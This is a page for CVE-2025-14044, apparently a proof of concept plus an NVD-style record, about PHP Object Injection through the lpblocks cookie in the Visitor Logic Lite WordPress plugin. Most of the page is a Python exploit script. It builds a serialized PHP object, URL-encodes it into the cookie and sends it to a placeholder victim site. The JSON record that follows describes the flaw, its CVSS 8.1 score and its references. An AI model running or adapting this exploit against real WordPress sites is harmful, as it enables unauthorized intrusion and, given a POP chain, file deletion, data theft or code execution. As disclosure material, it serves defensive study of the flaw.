CVE-2025-14044

import requests import urllib.parse import json # CVE-2025-14044 PoC - PHP Object Injection in Visitor Logic Lite # This PoC demonstrates how to inject a PHP object via the lpblocks cookie def generate_malicious_payload(): """ Generate a malicious serialized PHP object Note: Without a POP chain in the plugin, this alone won't achieve RCE A POP chain from another plugin/theme on the target system is required """ # Basic PHP object structure for injection # The actual exploitation depends on available POP chains malicious_object = 'O:8:"stdClass":1:{s:5:"data";s:10:"injected";}' return malicious_object def exploit(target_url, target_domain='example.com'): """ Send exploit request to target WordPress site """ # Encode the malicious payload for cookie payload = generate_malicious_payload() encoded_payload = urllib.parse.quote(payload) # Craft the lpblocks cookie with malicious payload cookies = { 'lpblocks': encoded_payload } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Host': target_domain, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close' } print(f'[*] Target: {target_url}') print(f'[*] Payload: {payload}') print(f'[*] Sending malicious cookie...') try: response = requests.get(target_url, cookies=cookies, headers=headers, timeout=10, verify=False) print(f'[+] Request sent successfully') print(f'[+] Response Status: {response.status_code}') return response except requests.RequestException as e: print(f'[-] Request failed: {e}') return None if __name__ == '__main__': # Example usage target = 'https://victim-site.com/' exploit(target, 'victim-site.com')

{"cve": {"id": "CVE-2025-14044", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:46.380", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Visitor Logic Lite plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.3 via deserialization of untrusted input from the `lpblocks` cookie. This is due to the `lp_track()` function passing unsanitized cookie data directly to the `unserialize()` function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code granted they can access the WordPress site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/logic-pro/tags/1.0.3/logic-lite.php#L131", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/logic-pro/trunk/logic-lite.php#L131", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60fb6928-96fb-4c1f-989c-cc07965b5266?source=cve", "source": "[email protected]"}]}}